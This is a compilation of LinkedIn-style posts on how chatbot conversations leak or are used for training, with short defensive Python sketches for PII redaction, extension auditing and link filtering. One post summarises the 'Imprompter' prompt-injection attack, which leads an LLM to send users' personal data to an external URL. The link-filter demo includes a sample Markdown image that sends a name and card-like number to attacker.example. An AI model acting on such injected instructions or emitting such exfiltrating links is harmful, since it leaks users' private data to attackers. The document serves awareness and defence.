This Stanford study examined how six major AI companies (Anthropic, OpenAI, Google, Meta, Microsoft, and Amazon) handle user data from chatbot conversations. Here are the main privacy concerns: 👀 All six companies use chat data for training by default, though some allow opt-out 👀 Data retention is often indefinite, with personal information stored long-term 👀 Cross-platform data merging occurs at multi-product companies (Google, Meta, Microsoft, Amazon) 👀 Children's data is handled inconsistently, with most companies not adequately protecting minors 👀 Transparency is limited: privacy policies are complex, hard to understand, and often lack crucial details about actual practices Practical takeaways for nonprofits' acceptable use policies and training on generative AI: ✅ Assume anything you share will be used for training - sensitive information, uploaded files, health details, biometric data, etc. ✅ Opt out when possible - proactively disable data collection for training (Meta is the one company where you cannot) ✅ Information cascades through ecosystems - your inputs can lead to inferences that affect ads, recommendations, and potentially insurance or other third parties ✅ Special concern for children's data - age verification and consent protections are inconsistent Some questions to consider in acceptable use policies and to incorporate in any training: ❓ What types of sensitive information might your nonprofit staff share with generative AI? ❓ Does your nonprofit currently identify what counts as “sensitive information” (beyond PID) that should not be shared with generative AI? Is this incorporated into training? ❓ Are you working with children, people with health conditions, or others whose data could be particularly harmful if leaked or misused? ❓ What would be the consequences if sensitive information or strategic organizational data ended up being used to train AI models? How might this affect trust, compliance, or your mission? 
How is this communicated in training and policy? Across the board, the Stanford research points out that developers’ privacy policies lack essential information about their practices. The researchers recommend that policymakers and developers address the data privacy challenges posed by LLM-powered chatbots through comprehensive federal privacy regulation, affirmative opt-in for model training, and filtering personal information from chat inputs by default. “We need to promote innovation in privacy-preserving AI, so that user privacy isn’t an afterthought.” How are you advocating for privacy-preserving AI? How are you educating your staff to navigate this challenge? https://lnkd.in/g3RmbEwD
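The recommendation to filter personal information from chat inputs can also be approximated on the user side, before a prompt ever leaves the organization. The following is a minimal sketch only: the `redact` helper and its three regular expressions are assumptions made for illustration (US-style phone and SSN formats), not anything described in the Stanford study, and real PII detection needs far broader coverage.

```python
import re
from typing import Dict, Tuple

# Hypothetical, deliberately small pattern set (an assumption for illustration).
# It will miss names, addresses, health details, and most non-US formats.
PATTERNS = {
    "EMAIL": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "PHONE": re.compile(
        r"(?<!\d)(?:\+?1[ .-]?)?\(?\d{3}\)?[ .-]?\d{3}[ .-]?\d{4}(?!\d)"
    ),
}


def redact(text: str) -> Tuple[str, Dict[str, int]]:
    """Replace each match with a [LABEL] placeholder and count the hits."""
    counts: Dict[str, int] = {}
    for label, pattern in PATTERNS.items():
        text, hits = pattern.subn(f"[{label}]", text)
        counts[label] = hits
    return text, counts


if __name__ == "__main__":
    prompt = "Email jane.doe@example.org or call (555) 123-4567; SSN 123-45-6789."
    cleaned, counts = redact(prompt)
    print(cleaned)
    print(counts)
```

A filter like this is a backstop for an acceptable use policy, not a substitute for one: the counts can feed training conversations ("three phone numbers were caught last week"), while the policy still has to define what staff should never paste in the first place.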
Understanding Chatbot Data Leaks
Summary
Understanding chatbot data leaks means recognizing how information shared with AI chatbots can be collected, stored, and potentially exposed, leading to privacy, legal, and reputational risks. Chatbot data leaks occur when sensitive or confidential user inputs are unintentionally made public or used without clear consent, often due to unclear privacy policies or misuse of sharing features.
- Review privacy settings: Always check and adjust your privacy options before using AI chatbots to prevent your conversations from being used for unintended purposes.
- Update workplace policies: Clearly define what data employees can share with chatbots and provide regular training to help them understand the risks of disclosing sensitive information.
- Audit tool usage: Regularly review which AI tools are being used in your organization and monitor how data is processed and shared to prevent accidental leaks.
-
What if I told you that the conversations you have with AI in chat (your prompts, responses, and potentially sensitive context) could be collected and sold for profit without clear user consent? Would you still type those questions? If you work anywhere near AI and care about your data, this should bother you. A recent report by Koi.ai revealed that a browser extension was collecting users’ AI conversations across 10 major AI platforms, using dedicated “executor” scripts designed specifically to intercept and capture #AI conversations. It gets worse: ➡️ The data harvesting runs continuously in the background, whether the VPN is connected or not. Some major red flags worth noting: 1️⃣ The extension auto-updated to version 5.5.0, with AI harvesting enabled by default (to give a sense of the scale, 8M users' conversations are exposed) 2️⃣ There is no option to disable this behavior, except uninstalling the extension entirely 3️⃣ The extension carries a “Featured” badge, implying platform review and quality standards (clearly a miss) 4️⃣ It is affiliated with a data broker company (biggest giveaway) 5️⃣ The privacy policy explicitly confirms the data flow (precise statements here: https://lnkd.in/gwXq8EKn), yet the Chrome Web Store listing states: “This developer declares that your data is not being sold to third parties, outside approved use cases” It is high time to #audit what you’ve installed, read the #privacy policies, and understand where your #data flows. Our convenience is coming at the cost of silent surveillance.
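One way to start the audit suggested above is to list which installed extensions are allowed to run on AI chat sites at all. The sketch below reads Chrome extension manifests from disk and flags those whose host permissions or content-script match patterns cover a chat domain. The `AI_HOSTS` list and the helper names are assumptions for illustration, and a flagged extension is only a candidate for review, not evidence of harvesting.

```python
import json
from pathlib import Path

# Assumption: an illustrative, incomplete list of AI chat hosts.
AI_HOSTS = ("chatgpt.com", "chat.openai.com", "claude.ai", "gemini.google.com")
# Match patterns that cover every site, and therefore AI chat sites too.
BROAD = ("<all_urls>", "*://*/*", "http://*/*", "https://*/*")


def touches_ai_chat(pattern: str) -> bool:
    """True if a match pattern is site-wide or names a listed AI host."""
    return pattern in BROAD or any(host in pattern for host in AI_HOSTS)


def audit_extensions(extensions_dir: Path) -> list:
    """Scan <extensions_dir>/<id>/<version>/manifest.json and report hits."""
    findings = []
    for manifest_path in sorted(extensions_dir.glob("*/*/manifest.json")):
        manifest = json.loads(manifest_path.read_text(encoding="utf-8-sig"))
        # Manifest V3 keeps host patterns in host_permissions; V2 mixes them
        # into permissions alongside API names such as "storage".
        patterns = list(manifest.get("host_permissions", []))
        patterns += [p for p in manifest.get("permissions", []) if isinstance(p, str)]
        for script in manifest.get("content_scripts", []):
            patterns += script.get("matches", [])
        hits = sorted({p for p in patterns if touches_ai_chat(p)})
        if hits:
            findings.append({
                "id": manifest_path.parent.parent.name,
                "name": manifest.get("name", "?"),  # may be a __MSG_...__ key
                "version": manifest.get("version", "?"),
                "patterns": hits,
            })
    return findings


if __name__ == "__main__":
    # Assumption: default Chrome profile on Linux; the path differs per OS.
    default_dir = Path.home() / ".config/google-chrome/Default/Extensions"
    for finding in audit_extensions(default_dir):
        print(finding)
```

Many legitimate extensions (ad blockers, password managers) request site-wide access, so expect a long list on first run. The point is to know which extensions could read a chat page, then check who publishes them and what their privacy policies say.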
-
A recent issue has emerged where private ChatGPT conversations, once shared, have become publicly searchable on Google. This is a huge red flag for HR. Conversations containing sensitive information, like employee personal details from CVs, confidential business plans, or even legal advice, are now potentially exposed. My key takeaways: ▶️ Data Privacy Nightmare: This isn't just a technical glitch; it's a massive data privacy risk. Imagine employee PII, performance review details, or internal strategy documents showing up in a public search. This could lead to serious breaches and legal repercussions under regulations like GDPR or state privacy laws. ▶️ Policy and Training Gap: The root of the problem is a lack of awareness. Employees are using AI tools without fully understanding the privacy and security implications. This is a clear indicator that your AI policy needs to be robust and your training needs to be a top priority. Do your employees know what they should and shouldn't be putting into AI tools, or sharing from them? ▶️ Mitigation is Key: 🔸Audit Your Tools: Review which AI tools your employees are using and what data they might be processing. 🔸Revise Your Policy: Update your acceptable use policy to explicitly address the use of generative AI, including what types of information are strictly forbidden from being inputted or shared. 🔸Train Your People: Conduct urgent training sessions to raise awareness about the risks of sharing conversations from AI tools. This situation highlights the critical need for a proactive approach to AI governance in HR. It's no longer just about the tech; it's about the people using it and the sensitive data they handle. What's your biggest concern about employees using generative AI?
-
ChatGPT is not your friend. It’s a database. In July 2025, Google indexed over 4,500 ChatGPT conversations containing sensitive personal information. Because users clicked “Share,” the system created public URLs. Google crawled, indexed and shared them. Here’s what surfaced: 🔸 Mental illness, addiction, and abuse 🔸 Names, locations, emails, resumes 🔸 Medical histories, legal strategies All searchable, linkable and public until OpenAI intervened: ✔️ The “Discoverable” sharing feature was disabled on July 31. ✔️ They are working with Google and other search engines to remove indexed chats. ✔️ OpenAI reminded users: deleting a chat from history does not delete the public link. Millions of people, including employees and customers, are confiding in AI. They believe it’s private and safe. But it isn’t. It’s recording. Indexing. Storing. And when systems designed for experimentation are used for confession, the boundaries between personal risk and enterprise liability vanish. What are the implications for Boards? 1️⃣ Regulatory risk Under GDPR: 🔹 Data subjects have rights to erasure, access, and informed consent. 🔹 Shared AI conversations with personal or sensitive data may violate these rights. 🔹 AI-generated prompts could fall under automated decision-making clauses. Under the EU AI Act: 🔹 Transparency, risk classification, and human oversight are mandatory. 🔹 This incident may be classified as a high-risk system failure in healthcare, HR, legal. 2️⃣ Legal risk There is currently no legal confidentiality in AI interactions. ✔️ Anything entered into AI could be subpoenaed, discoverable in court or leaked. ✔️ Companies are liable if employees share PII, IP, or client data via chatbots. ✔️ HR, Legal, and Compliance teams must assume AI logs are discoverable records. 3️⃣ Reputational risk People assumed they were talking to a trusted tool. Instead, they ended up on Google. 
For enterprises using AI for: ▫️ Coaching or mental health ▫️ HR assistance ▫️ Legal or compliance advisory ▫️ Customer service … this is a trust risk. Public exposure = brand damage. 4️⃣ Operational risk Many organisations lack: 📌 AI input/output governance 📌 Policies for AI use in confidential workflows 📌 Deletion/audit protocols for AI-linked data Takeaway If employees or customers treat ChatGPT like a coach or colleague, make sure you treat it like a legal and technical system. That means: ✅ Create AI use and data handling policies ✅ Restrict use of genAI in regulated or sensitive domains ✅ Review GDPR/AI Act exposure for all shared AI features ✅ Treat all AI interactions as auditable records ✅ Demand transparency from vendors: what is stored, shared, indexed? Until regulators catch up and new legal protections exist, assume every AI interaction is public, permanent, and admissible. #AIgovernance #Boardroom #EUAIACT #DigitalTrust #Stratedge
-
Your trade secrets just walked out the front door … and you might have held it open. No employee, except the rare bad actor, means to leak sensitive company data. But it happens, especially when people are using generative AI tools like ChatGPT to “polish a proposal,” “summarize a contract,” or “write code faster.” But here’s the problem: unless you’re using ChatGPT Team or Enterprise, it doesn’t treat your data as confidential. According to OpenAI’s own Terms of Use: “We do not use Content that you provide to or receive from our API to develop or improve our Services.” But don’t forget to read the fine print: that protection does not apply unless you’re on a business plan. For regular users, ChatGPT can use your prompts, including anything you type or upload, to train its large language models. Translation: That “confidential strategy doc” you asked ChatGPT to summarize? That “internal pricing sheet” you wanted to reword for a client? That “source code” you needed help debugging? ☠️ Poof. Trade secret status, gone. ☠️ If you don’t take reasonable measures to maintain the secrecy of your trade secrets, they will lose their protection as such. So how do you protect your business? 1. Write an AI Acceptable Use Policy. Be explicit: what’s allowed, what’s off limits, and what’s confidential. 2. Educate employees. Most folks don’t realize that ChatGPT isn’t a secure sandbox. Make sure they do. 3. Control tool access. Invest in an enterprise solution with confidentiality protections. 4. Audit and enforce. Treat ChatGPT the way you treat Dropbox or Google Drive, as tools that can leak data if unmanaged. 5. Update your confidentiality and trade secret agreements. Include restrictions on AI disclosures. AI isn’t going anywhere. The companies that get ahead of its risk will be the ones still standing when the dust settles. If you don’t have an AI policy and a plan to protect your data, you’re not just behind, you’re exposed.
-
I just watched a UX designer accidentally leak $12M worth of product strategy to ChatGPT in real-time. It happened during a design critique I was observing. He copy-pasted the entire product brief - codenames, launch dates, competitive analysis, user research with real participant quotes. All of it. Into a public AI system. No one in the room blinked an eye. I raised my hand and asked, "That is an interesting approach - who else here does something similar?" More than half of them raised their hands. I cringed at what I knew I was about to reveal. "I really hate to tell you this - but that is sharing commercially sensitive information with public AI systems. De-identifying information isn't enough - because AI's superpower is connecting seemingly disconnected information." The room went silent. Because we all realised: we've done this too. Here's the uncomfortable truth most of us don't discuss: As designers, we work a few months ahead of public releases. Our insights reveal strategic business direction. User research contains deeply personal information. Competitive intelligence is embedded in every design decision we make. We're trained to protect user privacy in our designs, yet we're surprisingly cavalier about privacy in our design process. What's at stake in 2025: - New EU AI regulations hold companies liable for data breaches. - Public AI tools are logging everything for training. Your client's biggest competitor might be using the same AI system. - The window to fix this quietly is closing. - This carousel shows you how to keep leveraging AI without becoming a walking NDA violation. - Because the future of design isn't just about AI literacy - it's about AI responsibility. The two-step abstraction method I share here preserves the strategic value whilst protecting confidentiality. It's about being professionals who can harness these tools without compromising the trust our clients place in us. 👇 🔥 TAG A Designer who needs to see this. 👇
-
AI browsers like ChatGPT Atlas are “always-on” co-pilots with the same access to session data, cookies, credentials, and content as the user. However, there are no enterprise controls or visibility around what the AI collects or sends back to the cloud model. They introduce massive blindspots and new data leakage vectors 😬😬: 1. Session memory leakage AI browsers capture session context such as active tab content, search history, and copy-pasted data to personalize results. Sensitive information can be embedded into prompts and sent to the vendor’s LLM API. 2. Shadow prompting Many AI browsers “auto-prompt” the model behind the scenes e.g., summarize this document, improve this draft, which can transmit page content and text selections outside enterprise visibility. 3. Training feedback Unless explicitly disabled, corporate session data can indirectly become training material for external AI systems 4. Identity and cookie exposure AI browsers use unified login sessions and shared cookies to fetch user-contextual answers – increasing the attack surface for session hijacking and identity replay, especially when AI sidebars interact with authenticated SaaS apps. 5. Unvetted agent ecosystems Some AI browsers allow third-party AI “agents” or extensions to automate web actions, such as scraping, posting, or extracting enterprise data with no audit trail or policy enforcement. More insights from our telemetry of millions of enterprise browser sessions → https://lnkd.in/dzm5FKkv
-
What happens to your AI chat data? If you’re using tools like ChatGPT or Gemini to generate ideas, write, summarize, or analyze, you're not alone. But if you're entering anything sensitive or strategic into those prompts, it’s time to pause, think, and ask a critical question: Who else can see this? I know I've wondered this before. A recent article in Fast Company uncovered something that’s flown under the radar for many professionals using generative AI tools in their workflow. Here are a few of the biggest takeaways: → AI models like ChatGPT use your chat data to train their models by default. Unless you actively disable this in your settings, OpenAI can store and use your conversations to improve its systems. Same with Gemini. I'm not sure about Claude and others. → Human reviewers may read your chats. That clever prompt you typed? It may be reviewed by a real person for quality control. This is especially important if you’re handling anything confidential, such as internal strategy docs, early-stage marketing plans, or even anonymized customer insights. → Shared chats have shown up in Google search. Fast Company found nearly 4,500 publicly shared ChatGPT chats indexed by Google, some containing sensitive personal or business data. OpenAI has since removed the feature that made these discoverable, but the lesson remains: treat AI chats like emails—they can be forwarded, indexed, or resurfaced. Just deleting your history doesn’t always mean it's gone. AI companies often retain chat logs for security or compliance. And Google Gemini currently doesn’t offer a “private mode” like ChatGPT’s temporary chat option. So, what can you do? Adjust your settings. In ChatGPT, go to Settings → Data Controls → Turn off “Improve the Model for Everyone.” Also, use “temporary chat” for sensitive queries. Be mindful of what you input. If it’s something you wouldn’t put in a Slack thread or email, maybe you shouldn't drop it into a chatbot. 
Avoid public sharing links unless you’re sure. Screenshots or copy/paste are safer if you need to circulate something. Let's keep in mind that AI is a powerful tool, but privacy is still your responsibility. I bring this up not to sound the alarm but to encourage thoughtful use. Many of us are building content, strategy, and workflows around these tools. Let’s also build habits that reflect the trust and diligence we expect from our own clients and partners. Out of curiosity, have you updated your AI tool privacy settings recently? Did you know this was even an issue? Link to article in comments 👇
-
A Chatbot Prompt to Exfiltrate Data Security researchers from UCSD and Nanyang Technological University have developed an algorithm that can covertly command large language models (LLMs) to collect and transmit users' personal information, like names, payment details, and addresses, to hackers. This technique, dubbed “Imprompter,” disguises instructions within random characters that an LLM interprets as commands to extract data and send it to an external URL without alerting the user. Tested on LLMs like Mistral AI’s LeChat and ChatGLM, Imprompter demonstrated a high success rate, prompting Mistral AI to fix a related vulnerability. The attack highlights broader concerns around LLM security, as these models are increasingly integrated with functions that could be exploited. Experts caution companies and individuals alike to be mindful of the information shared with AI systems, especially as prompt injections—covert instructions hidden within seemingly harmless inputs—pose a growing risk in AI security.
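Because the attack described above depends on the model's output reaching an external URL, one generic mitigation is to filter links in that output before a client renders it. The sketch below assumes the exfiltration channel is a Markdown image or link (for example an image that a chat client fetches automatically). This is an illustrative defense, not the fix Mistral AI shipped and not the researchers' method, and `ALLOWED_HOSTS` and `strip_untrusted_links` are hypothetical names.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the chat client may link to or load from.
ALLOWED_HOSTS = {"example.org"}

# Markdown images ![alt](url) and links [text](url); an optional title after
# the URL is tolerated. Bare URLs in plain text are NOT covered by this sketch.
MD_LINK = re.compile(r"(!?)\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def strip_untrusted_links(model_output: str) -> str:
    """Drop Markdown images and unwrap links whose host is not allowlisted."""

    def _replace(match):
        is_image, label, url = match.group(1), match.group(2), match.group(3)
        host = (urlparse(url).hostname or "").lower()
        if host in ALLOWED_HOSTS:
            return match.group(0)  # keep trusted links untouched
        # Images are fetched without a click, so remove them entirely;
        # for links, keep only the visible text.
        return "[image removed]" if is_image else label

    return MD_LINK.sub(_replace, model_output)


if __name__ == "__main__":
    reply = (
        "Done! ![a](https://attacker.example/p?q=Jane+Doe%2C4111) "
        "See [docs](https://example.org/help)."
    )
    print(strip_untrusted_links(reply))
```

Relative URLs have no hostname and are therefore removed as well, which errs on the side of caution. Output filtering addresses only one channel; it does nothing about tool calls or agents that can make network requests on their own.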
-
You paid your lawyer $500 for a one-hour legal strategy session. Then you pasted it into ChatGPT to "understand it better." CONGRATS: opposing counsel can now subpoena that chat. This isn't hypothetical. In United States v. Heppner, a CEO pasted his lawyer's defense strategy into Claude AI. The FBI seized his devices and found all the chats. All 31 of them. And when he tried to claim privilege — the court shut it down. Reason: Attorney-client privilege only works when the conversation stays confidential. When you share it with a third party, that protection is gone. And AI platforms are third parties. ChatGPT, Claude, Gemini. These are companies with servers, data policies, terms of service. None of them owe you confidentiality. That's not a private conversation anymore. That's a record. And the other side can ask for it. I get it. AI feels private. Like a notes app. Like thinking out loud. But legally, it's not. And don't get me wrong. I'm not anti-AI. I run a law firm. We use it too. But instead of public AI, we use enterprise tools with safeguards that don't train on client data. If it's legal, strategic, or sensitive: DO NOT paste it into a chatbot. And if you're still in doubt, ask yourself: Would you hand this to opposing counsel? If the answer is no, don't hand it to ChatGPT either.